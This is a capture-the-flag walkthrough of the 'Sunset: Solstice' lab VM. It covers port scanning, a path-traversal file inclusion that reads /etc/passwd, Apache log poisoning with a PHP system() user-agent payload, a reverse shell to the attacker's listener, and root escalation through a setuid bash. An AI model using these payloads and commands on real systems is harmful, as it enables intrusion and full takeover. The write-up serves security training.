Sunset: Solstice

Port recognition withnmap

┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV -p- solstice.vuln
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-26 11:48 EST
Nmap scan report for solstice.vuln (10.0.2.78)
Host is up (0.000064s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         pyftpdlib 1.5.6
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp    open  smtp        Exim smtpd 4.92
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
3128/tcp  open  http-proxy  Squid http proxy 4.6
8593/tcp  open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
54787/tcp open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
62524/tcp open  ftp         FreeFloat ftpd 1.00
MAC Address: 08:00:27:4D:94:A7 (Oracle VirtualBox virtual NIC)
Service Info: Host: solstice; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.63 seconds

nmap reports eleven open ports

┌──(root@ghost)-[/home/ghost]
└─# curl http://solstice.vuln:8593
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=Comic+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?book=list">Book List</a>
        </div>
We are still setting up the library! Try later on!<p></p>    </body>
</html>

After visiting http://solstice.vuln:8593 we can see http://solstice.vuln:8593/index.php?book=list, somehow book parameter is expecting list argument, list should be a file. Knowing this we can try escape from the given path with path traversal string (../) and check if is vulnerable to local file inclusion

┌──(root@ghost)-[/home/ghost]
└─# curl http://solstice.vuln:8593/index.php?book=../../../../etc/passwd             
<html>
    <head>
        <link href="https://fonts.googleapis.com/css?family=Comic+Sans" rel="stylesheet"> 
        <link rel="stylesheet" type="text/css" href="style.css">
    </head>
    <body>
        <div class="menu">
            <a href="index.php">Main Page</a>
            <a href="index.php?book=list">Book List</a>
        </div>
We are still setting up the library! Try later on!<p>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
avahi:x:106:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:107:118::/var/lib/saned:/usr/sbin/nologin
colord:x:108:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
uuidd:x:112:121::/run/uuidd:/usr/sbin/nologin
smmta:x:113:122:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:114:123:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin
Debian-exim:x:115:124::/var/spool/exim4:/usr/sbin/nologin
</p>    </body>
</html>

We found the local file inclusion

┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum "http://solstice.vuln:8593/index.php?book=../../../.." --only-url 
> http://solstice.vuln:8593/index.php?book=../../../../etc/passwd
> http://solstice.vuln:8593/index.php?book=../../../../etc/aliases
> http://solstice.vuln:8593/index.php?book=../../../../etc/anacrontab
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/apache2.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/crontab
> http://solstice.vuln:8593/index.php?book=../../../../etc/cups/cupsd.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/fstab
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts.allow
> http://solstice.vuln:8593/index.php?book=../../../../etc/hosts.deny
> http://solstice.vuln:8593/index.php?book=../../../../etc/issue
> http://solstice.vuln:8593/index.php?book=../../../../etc/motd
> http://solstice.vuln:8593/index.php?book=../../../../etc/mtab
> http://solstice.vuln:8593/index.php?book=../../../../etc/mysql/my.cnf
> http://solstice.vuln:8593/index.php?book=../../../../etc/network/interfaces
> http://solstice.vuln:8593/index.php?book=../../../../etc/networks
> http://solstice.vuln:8593/index.php?book=../../../../etc/printcap
> http://solstice.vuln:8593/index.php?book=../../../../etc/profile
> http://solstice.vuln:8593/index.php?book=../../../../etc/resolv.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/samba/smb.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ssh/ssh_config
> http://solstice.vuln:8593/index.php?book=../../../../etc/ssh/sshd_config
> http://solstice.vuln:8593/index.php?book=../../../../proc/cpuinfo
> http://solstice.vuln:8593/index.php?book=../../../../proc/filesystems
> http://solstice.vuln:8593/index.php?book=../../../../proc/interrupts
> http://solstice.vuln:8593/index.php?book=../../../../proc/ioports
> http://solstice.vuln:8593/index.php?book=../../../../proc/meminfo
> http://solstice.vuln:8593/index.php?book=../../../../proc/modules
> http://solstice.vuln:8593/index.php?book=../../../../proc/mounts
> http://solstice.vuln:8593/index.php?book=../../../../proc/sched_debug
> http://solstice.vuln:8593/index.php?book=../../../../proc/stat
> http://solstice.vuln:8593/index.php?book=../../../../proc/swaps
> http://solstice.vuln:8593/index.php?book=../../../../proc/version
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/net/arp
> http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/access.log
> http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/error.log
> http://solstice.vuln:8593/index.php?book=../../../../var/log/faillog
> http://solstice.vuln:8593/index.php?book=../../../../var/log/lastlog
> http://solstice.vuln:8593/index.php?book=../../../../var/log/wtmp
> http://solstice.vuln:8593/index.php?book=../../../../var/run/utmp
> http://solstice.vuln:8593/index.php?book=../../../../etc/adduser.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/envvars
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/autoindex.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/deflate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/dir.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/mime.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/proxy.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/setenvif.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-available/ssl.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/alias.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/deflate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/dir.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/mime.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/negotiation.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/mods-enabled/status.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/apache2/ports.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/avahi/avahi-daemon.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bash.bashrc
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/input.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/main.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/bluetooth/network.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ca-certificates.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/debconf.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/debian_version
> http://solstice.vuln:8593/index.php?book=../../../../etc/default/grub
> http://solstice.vuln:8593/index.php?book=../../../../etc/deluser.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/dhcp/dhclient.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/group
> http://solstice.vuln:8593/index.php?book=../../../../etc/group-
> http://solstice.vuln:8593/index.php?book=../../../../etc/hdparm.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/host.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/hostname
> http://solstice.vuln:8593/index.php?book=../../../../etc/issue.net
> http://solstice.vuln:8593/index.php?book=../../../../etc/kernel-img.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ld.so.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/ldap/ldap.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/login.defs
> http://solstice.vuln:8593/index.php?book=../../../../etc/logrotate.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/mail/sendmail.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/manpath.config
> http://solstice.vuln:8593/index.php?book=../../../../etc/modules
> http://solstice.vuln:8593/index.php?book=../../../../etc/os-release
> http://solstice.vuln:8593/index.php?book=../../../../etc/pam.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/passwd-
> http://solstice.vuln:8593/index.php?book=../../../../etc/pulse/client.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/resolvconf/update-libc.d/sendmail
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/access.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/group.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/limits.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/namespace.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/pam_env.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/sepermit.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/security/time.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/sensors3.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/sysctl.conf
> http://solstice.vuln:8593/index.php?book=../../../../etc/timezone
> http://solstice.vuln:8593/index.php?book=../../../../proc/devices
> http://solstice.vuln:8593/index.php?book=../../../../proc/net/tcp
> http://solstice.vuln:8593/index.php?book=../../../../proc/net/udp
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/cmdline
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/environ
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/mounts
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/stat
> http://solstice.vuln:8593/index.php?book=../../../../proc/self/status
> http://solstice.vuln:8593/index.php?book=../../../../usr/share/adduser/adduser.conf

Enumerating the local file inclusion with lfienum

We are gonna focus our attention to apache logs /var/log/apache2/access.log and /var/log/apache2/error.log, try if they can be poisoned. After a few checks you can send malicious php user-agent in the http header to http://solstice.vuln:80 and will be reflected in http://solstice.vuln:8593/index.php?book=../../../../var/log/apache2/access.log

┌──(root@ghost)-[/home/ghost]
└─# cat cmd.py                                                                          
import requests
headers = { "User-Agent": "<?php system($_GET['cmd']); ?>" }
requests.get("http://solstice.vuln/", headers=headers)

Poisoning log in port 80

┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://solstice.vuln:8593/index.php?book=../../../../../" apache 10.0.2.15 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*

💀 Poison /var/log/apache2/access.log
💀 Sending payload

listening on [any] 1337 ...
connect to [10.0.2.15] from solstice.vuln [10.0.2.78] 44580
bash: cannot set terminal process group (381): Inappropriate ioctl for device
bash: no job control in this shell
www-data@solstice:/var/tmp/webserver$

Using lfi2rce script to get an auto reverse shell with log already poisoned expecting cmd parameter

www-data@solstice:/var/tmp/sv$ ls -la
total 12
drwsrwxrwx 2 root root 4096 Jun 26  2020 .
drwxrwxrwt 9 root root 4096 Feb 26 13:09 ..
-rwxrwxrwx 1 root root   36 Jun 19  2020 index.php
www-data@solstice:/var/tmp/sv$ cat index.php
<?php
echo "Under construction";
?>
www-data@solstice:/var/tmp/sv$

We found a file to escalate our privileges

www-data@solstice:/var/tmp/sv$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8593            0.0.0.0:*               LISTEN      399/php             
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:57            0.0.0.0:*               LISTEN      -                   

...

www-data@solstice:/var/tmp/sv$ curl 127.0.0.1:57
Under construction
www-data@solstice:/var/tmp/sv$

We found the local server who is hosting that index.php file

www-data@solstice:/var/tmp/sv$ cat index.php
<?php
system('chmod +s /bin/bash');
?>

Modifying file to give suid bit to bash

www-data@solstice:/var/tmp/sv$ curl 127.0.0.1:57
www-data@solstice:/var/tmp/sv$ bash -p
bash-5.0# cat /root/root.txt

No ascii art for you >:(

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

f950998f0d484a2ef1ea83ed4f42bbca